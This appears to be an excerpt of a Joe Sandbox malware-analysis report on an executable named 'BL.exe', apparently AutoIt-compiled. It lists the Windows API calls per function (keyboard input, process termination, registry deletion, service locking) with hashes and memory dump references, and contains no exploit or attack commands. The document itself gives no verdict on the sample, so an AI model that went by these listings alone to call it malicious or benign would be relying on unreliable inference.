                                                                                                                            • API String ID: 2833360925-0
                                                                                                                            • Opcode ID: ce9720f61a9ee9538873cf1403cb39b7711a51cb3deac7b7aa4b9b4cf2db8b86
                                                                                                                            • Instruction ID: c21ea81f2c38402705b15ef58ab4919efdb6e4f3ef0ac894e378511a69de5cf2
                                                                                                                            • Opcode Fuzzy Hash: ce9720f61a9ee9538873cf1403cb39b7711a51cb3deac7b7aa4b9b4cf2db8b86
                                                                                                                            • Instruction Fuzzy Hash: C411D031909306ABC700EF19DA8499FB7E4FFCCB11F828D2DF98592210D734C9498B96
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                                                              • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                                                              • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                                                              • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                                                              • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                                                            • MoveToEx.GDI32(?,?,?,00000000), ref: 0044721F
                                                                                                                            • LineTo.GDI32(?,?,?), ref: 00447227
                                                                                                                            • MoveToEx.GDI32(?,?,?,00000000), ref: 00447235
                                                                                                                            • LineTo.GDI32(?,?,?), ref: 0044723D
                                                                                                                            • EndPath.GDI32(?), ref: 0044724E
                                                                                                                            • StrokePath.GDI32(?), ref: 0044725C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 372113273-0
                                                                                                                            • Opcode ID: 902a14e142be2de25a3bb197ce65ea465fb84dbb313772e519df98722d37df37
                                                                                                                            • Instruction ID: cf4011081099dc8586e946db52605055ec0608de7db987eb6b7af15cf0be2a5d
                                                                                                                            • Opcode Fuzzy Hash: 902a14e142be2de25a3bb197ce65ea465fb84dbb313772e519df98722d37df37
                                                                                                                            • Instruction Fuzzy Hash: B7018F36105264BBE2119750EC4AF9FBBACEF8A710F14451DF70156191C7F42A0587BD
                                                                                                                            APIs
                                                                                                                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 0041098F
                                                                                                                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410997
                                                                                                                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 004109A2
                                                                                                                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 004109AD
                                                                                                                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 004109B5
                                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 004109BD
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Virtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4278518827-0
                                                                                                                            • Opcode ID: 067efc0be0420d5e011611900d1cbcbd564411b72165316cb005851f0732894c
                                                                                                                            • Instruction ID: 14dd698fb88c41d3cb2937c08abaa7ad6cdafd80764dd657d9f2199fb51feb0a
                                                                                                                            • Opcode Fuzzy Hash: 067efc0be0420d5e011611900d1cbcbd564411b72165316cb005851f0732894c
                                                                                                                            • Instruction Fuzzy Hash: 52112A6118ABC4ADD3329F694854A87FFE45FB6304F484A8ED1D607A43C195A60CCBBA
                                                                                                                            APIs
                                                                                                                            • GetDC.USER32(00000000), ref: 0044CBEF
                                                                                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC00
                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC09
                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0044CC10
                                                                                                                            • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CC29
                                                                                                                            • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0044CC37
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CapsDevice$Release
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1035833867-0
                                                                                                                            • Opcode ID: ae25b50e6df40ac1760f249dbc4ceec79d7598f555d49c24eefaf783d5b8ff63
                                                                                                                            • Instruction ID: 50bf861fd692b93b916a63282857a41227f0dfa19545bc4f0a59f576ae553c11
                                                                                                                            • Opcode Fuzzy Hash: ae25b50e6df40ac1760f249dbc4ceec79d7598f555d49c24eefaf783d5b8ff63
                                                                                                                            • Instruction Fuzzy Hash: 560184B1641314BFF6009BA1DC4AF1BBB9CEF55755F01842EFF44A7241D6B098008BA9
                                                                                                                            APIs
                                                                                                                            • InterlockedExchange.KERNEL32(0042A369,057401F8), ref: 0044B66E
                                                                                                                            • EnterCriticalSection.KERNEL32(0042A321), ref: 0044B67B
                                                                                                                            • TerminateThread.KERNEL32(?,000001F6), ref: 0044B689
                                                                                                                            • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B697
                                                                                                                              • Part of subcall function 004356CD: CloseHandle.KERNEL32(00000000,0042A365,0044B6A3,0042A365,?,000003E8,?,000001F6), ref: 004356D9
                                                                                                                            • InterlockedExchange.KERNEL32(0042A369,000001F6), ref: 0044B6AC
                                                                                                                            • LeaveCriticalSection.KERNEL32(0042A321), ref: 0044B6AF
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3495660284-0
                                                                                                                            • Opcode ID: 7ab0c325316775d38e8d9aa2ca09049d0c02a968ddf60f226b23d446a35990e5
                                                                                                                            • Instruction ID: 3e278a896620ffa5fdfd5bcc44ba61fc9bc9ab212b345b13b81bb6ec37c91fca
                                                                                                                            • Opcode Fuzzy Hash: 7ab0c325316775d38e8d9aa2ca09049d0c02a968ddf60f226b23d446a35990e5
                                                                                                                            • Instruction Fuzzy Hash: E3F0F672141206BBD210AB24EE89DBFB37CFF44315F41096AF60142550CB75F811CBBA
                                                                                                                            APIs
                                                                                                                            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00437127
                                                                                                                            • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00437140
                                                                                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 00437150
                                                                                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 00437162
                                                                                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 0043716D
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00437174
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 839392675-0
                                                                                                                            • Opcode ID: 9671eea5464782d863345c1ba519a7d6af1158a8c6613e6f42f5b6706bbe0782
                                                                                                                            • Instruction ID: 38550948ec006cf47bed7574f40cc63f5aae242ba43c895826076912260f23cd
                                                                                                                            • Opcode Fuzzy Hash: 9671eea5464782d863345c1ba519a7d6af1158a8c6613e6f42f5b6706bbe0782
                                                                                                                            • Instruction Fuzzy Hash: 37F054352813117BE6215B109E4EFEF37A8AF49F02F104828FB41B51D0E7E469458BAE
                                                                                                                            APIs
                                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000008,004A8E80,BC000000,00431B28,C:\Users\user\Desktop\BL.exe,00000004), ref: 00436055
                                                                                                                            • LockServiceDatabase.ADVAPI32(00000000), ref: 00436062
                                                                                                                            • UnlockServiceDatabase.ADVAPI32(00000000), ref: 0043606D
                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 00436076
                                                                                                                            • GetLastError.KERNEL32 ref: 00436081
                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 00436091
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Service$CloseDatabaseHandle$ErrorLastLockManagerOpenUnlock
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1690418490-0
                                                                                                                            • Opcode ID: 49e5e78db470eb3b31ed20f2670ed0ea18d225c835d46e40371f5509899a8be7
                                                                                                                            • Instruction ID: 156e5f382d75df54ba3c5c30185d6bb62b1a9e6e0194ec4ef6b9e4a62dbea0b3
                                                                                                                            • Opcode Fuzzy Hash: 49e5e78db470eb3b31ed20f2670ed0ea18d225c835d46e40371f5509899a8be7
                                                                                                                            • Instruction Fuzzy Hash: 9BE0E5319821216BC6231B30AE4DBCF3B99DB1F311F041827F701D2250CB998404DBA8
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00442C52: _wcslen.LIBCMT ref: 00442C82
                                                                                                                            • CoInitialize.OLE32(00000000), ref: 00475B71
                                                                                                                            • CoCreateInstance.OLE32(00482A50,00000000,00000001,004828B0,?), ref: 00475B8A
                                                                                                                            • CoUninitialize.OLE32 ref: 00475D71
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                            • String ID: .lnk$HH
                                                                                                                            • API String ID: 886957087-3121654589
                                                                                                                            • Opcode ID: 75a96ccae25093af7e6917375c938c281093df7f6cda4de25b1c017a61ab28fd
                                                                                                                            • Instruction ID: f4d7caca580305710a2a5ca379fd8543151c5613ecc12b631d1ff665410dc3a0
                                                                                                                            • Opcode Fuzzy Hash: 75a96ccae25093af7e6917375c938c281093df7f6cda4de25b1c017a61ab28fd
                                                                                                                            • Instruction Fuzzy Hash: B0819D75604300AFD310EF65CC82F5AB3A9EF88704F50892DF658AF2D2D6B5E905CB99
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Menu$Delete$InfoItem_memset
                                                                                                                            • String ID: 0
                                                                                                                            • API String ID: 1173514356-4108050209
                                                                                                                            • Opcode ID: e31d5a25326cfad936127cde49464cb56a2d17833d4ec3f4ad79405d5b41ed43
                                                                                                                            • Instruction ID: b3a4179b3c174fb1a3aa0d908437eb3f68f1f523a6631853a4ee88e897a1c7ed
                                                                                                                            • Opcode Fuzzy Hash: e31d5a25326cfad936127cde49464cb56a2d17833d4ec3f4ad79405d5b41ed43
                                                                                                                            • Instruction Fuzzy Hash: 31418CB55043019BD710CF19C884B5BBBE5AFC5324F148A6EFCA49B282C375E809CBA6
                                                                                                                            APIs
                                                                                                                            • LoadLibraryA.KERNEL32(?), ref: 00437CB2
                                                                                                                            • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00437D26
                                                                                                                            • FreeLibrary.KERNEL32(?,?,AU3_GetPluginDetails), ref: 00437D3D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Library$AddressFreeLoadProc
                                                                                                                            • String ID: AU3_GetPluginDetails$#v
                                                                                                                            • API String ID: 145871493-3662034293
                                                                                                                            • Opcode ID: c408ffbdf54b3153002ace85412cc7a30708aaf56f74f2a47fe0f31dd6af338b
                                                                                                                            • Instruction ID: 909018a8305b4cb0ce841e730e5bf8c258fddf5044228ae68d4d210ccee2088c
                                                                                                                            • Opcode Fuzzy Hash: c408ffbdf54b3153002ace85412cc7a30708aaf56f74f2a47fe0f31dd6af338b
                                                                                                                            • Instruction Fuzzy Hash: 054147B96042019FC314DF68D8C4D5AF3E5FF8D304B20866EE9568B751DB35E802CB96
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469368
                                                                                                                            • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00469379
                                                                                                                            • SendMessageW.USER32(?,?,00000000,00000000), ref: 004693AB
                                                                                                                              • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$_wcslen
                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                            • API String ID: 763830540-1403004172
                                                                                                                            • Opcode ID: 1431e30169807b15fc9b08fac251d8bb29e73564cb98c7e006ef338c651461fb
                                                                                                                            • Instruction ID: 8c71ebf423f389569590ff88e643f185c263fd61562863516bde62979c95be4e
                                                                                                                            • Opcode Fuzzy Hash: 1431e30169807b15fc9b08fac251d8bb29e73564cb98c7e006ef338c651461fb
                                                                                                                            • Instruction Fuzzy Hash: E0210C7160020067C210BB3A9C46FAF77989B85364F09052FF959AB3D1EA7CE94A436E
                                                                                                                            APIs
                                                                                                                            • GetStdHandle.KERNEL32(?), ref: 004439B4
                                                                                                                              • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(0000002C,00000000,00000000,00000002,76232EE0,00000000,004437E2,?,0000002C,00000000,?,?,?), ref: 004356BD
                                                                                                                              • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(?,00000000,?,?,?), ref: 004356C1
                                                                                                                              • Part of subcall function 0043569D: DuplicateHandle.KERNEL32(00000000,?,?,?), ref: 004356C4
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentHandleProcess$Duplicate
                                                                                                                            • String ID: nul
                                                                                                                            • API String ID: 2124370227-2873401336
                                                                                                                            • Opcode ID: 1f0ba76bcec97c73efa3faab39b1dec00fe260a428cb25b20c1b65e4e3d5eb1c
                                                                                                                            • Instruction ID: e5202fea31d744cc2812a948a395a4146b23d8233fafbd02014e3d546f800e0b
                                                                                                                            • Opcode Fuzzy Hash: 1f0ba76bcec97c73efa3faab39b1dec00fe260a428cb25b20c1b65e4e3d5eb1c
                                                                                                                            • Instruction Fuzzy Hash: 8921A070104301ABE320DF28D886B9B77E4AF94B24F504E1EF9D4972D1E3B5DA54CBA6
                                                                                                                            APIs
                                                                                                                            • GetStdHandle.KERNEL32(000000F6), ref: 004438B7
                                                                                                                              • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(0000002C,00000000,00000000,00000002,76232EE0,00000000,004437E2,?,0000002C,00000000,?,?,?), ref: 004356BD
                                                                                                                              • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(?,00000000,?,?,?), ref: 004356C1
                                                                                                                              • Part of subcall function 0043569D: DuplicateHandle.KERNEL32(00000000,?,?,?), ref: 004356C4
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentHandleProcess$Duplicate
                                                                                                                            • String ID: nul
                                                                                                                            • API String ID: 2124370227-2873401336
                                                                                                                            APIs
                                                                                                                            • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00441333
                                                                                                                            • LoadLibraryW.KERNEL32(?,?,?,?,0047B4D0,?,?,?,?,?,?,?,?,?,00000000), ref: 0044133A
                                                                                                                            • SendMessageW.USER32(?,00000467,00000000,?), ref: 00441352
                                                                                                                            • DestroyWindow.USER32(00000000,?,00000467,00000000,?,?,?,?,0047B4D0,?,?,?,?,?,?), ref: 0044135B
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                                            • String ID: SysAnimate32
                                                                                                                            • API String ID: 3529120543-1011021900
                                                                                                                            APIs
                                                                                                                            • PeekMessageW.USER32(00000000,00000000,00000000,00000000,00000001), ref: 0044304E
                                                                                                                            • TranslateMessage.USER32(?), ref: 0044308B
                                                                                                                            • DispatchMessageW.USER32(?), ref: 00443096
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004430AD
                                                                                                                            Similarity
                                                                                                                            • API ID: Message$Peek$DispatchTranslate
                                                                                                                            • String ID: *.*
                                                                                                                            • API String ID: 1795658109-438819550
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                              • Part of subcall function 004389A1: SendMessageTimeoutW.USER32(00000001,00000000,00000000,00000000,00000002,00001388,004848E8), ref: 004389C0
                                                                                                                              • Part of subcall function 004389A1: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 004389D3
                                                                                                                              • Part of subcall function 004389A1: GetCurrentThreadId.KERNEL32 ref: 004389DA
                                                                                                                              • Part of subcall function 004389A1: AttachThreadInput.USER32(00000000), ref: 004389E1
                                                                                                                            • GetFocus.USER32 ref: 004609EF
                                                                                                                              • Part of subcall function 004389EB: GetParent.USER32(?), ref: 004389F7
                                                                                                                              • Part of subcall function 004389EB: GetParent.USER32(?), ref: 00438A04
                                                                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 00460A37
                                                                                                                            • EnumChildWindows.USER32(?,00445A31,?), ref: 00460A60
                                                                                                                            • __swprintf.LIBCMT ref: 00460A7A
                                                                                                                            Similarity
                                                                                                                            • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_wcslen
                                                                                                                            • String ID: %s%d
                                                                                                                            • API String ID: 991886796-1110647743
                                                                                                                            APIs
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset$_sprintf
                                                                                                                            • String ID: %02X
                                                                                                                            • API String ID: 891462717-436463671
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 0042CD00
                                                                                                                            • GetOpenFileNameW.COMDLG32 ref: 0042CD51
                                                                                                                              • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\BL.exe,?,C:\Users\user\Desktop\BL.exe,004A8E80,C:\Users\user\Desktop\BL.exe,0040F3D2), ref: 0040FFCA
                                                                                                                              • Part of subcall function 00410130: SHGetMalloc.SHELL32(00000000), ref: 0041013A
                                                                                                                              • Part of subcall function 00410130: SHGetDesktopFolder.SHELL32(?,004A8E80), ref: 00410150
                                                                                                                              • Part of subcall function 00410130: _wcscpy.LIBCMT ref: 00410160
                                                                                                                              • Part of subcall function 00410130: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410197
                                                                                                                              • Part of subcall function 00410130: _wcscpy.LIBCMT ref: 004101AC
                                                                                                                              • Part of subcall function 00410020: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 00410037
                                                                                                                            Similarity
                                                                                                                            • API ID: NamePath$Full_wcscpy$DesktopFileFolderFromListMallocOpen_memset
                                                                                                                            • String ID: $OH$@OH$X
                                                                                                                            • API String ID: 3491138722-1394974532
                                                                                                                            APIs
                                                                                                                            • GetKeyboardState.USER32(?,?,00000001,00000001,?,00000000), ref: 0044C3DA
                                                                                                                            • SetKeyboardState.USER32(00000080), ref: 0044C3ED
                                                                                                                            • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C441
                                                                                                                            • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C465
                                                                                                                            • SendInput.USER32 ref: 0044C509
                                                                                                                            Similarity
                                                                                                                            • API ID: KeyboardMessagePostState$InputSend
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3031425849-0
                                                                                                                            APIs
                                                                                                                            • RegEnumKeyExW.ADVAPI32 ref: 004422F0
                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,00000000,00000000,?,?), ref: 0044232B
                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0044234E
                                                                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00442390
                                                                                                                            • RegEnumKeyExW.ADVAPI32(?,00000000), ref: 004423C0
Similarity
• API ID: Enum$CloseDeleteOpen
• API String ID: 2095303065-0
APIs
• GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C2F4
• GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C31B
• WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C363
